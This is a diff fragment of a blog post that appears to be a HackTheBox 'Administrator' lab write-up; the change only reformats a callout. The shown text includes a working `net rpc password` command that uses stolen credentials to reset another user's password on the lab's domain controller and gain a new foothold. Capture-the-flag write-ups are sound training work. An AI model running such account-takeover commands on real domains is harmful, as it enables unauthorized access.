Deesick/deesick.github.io/_posts/2025-11-10-Administrator.md

 net rpc password "michael" "password123." -U "administrator.htb"/"olivia"%"ichliebedich" -S 10.129.15.252
 ```

-###### **Why act now**: changing Michael’s password is the shortest path to a new foothold.
+> **Why act now**: changing Michael’s password is the shortest path to a new foothold.
 Once I can pivot to Michael, I can re-run enumeration, and look for further delegation.
+{: .prompt-info }

 ---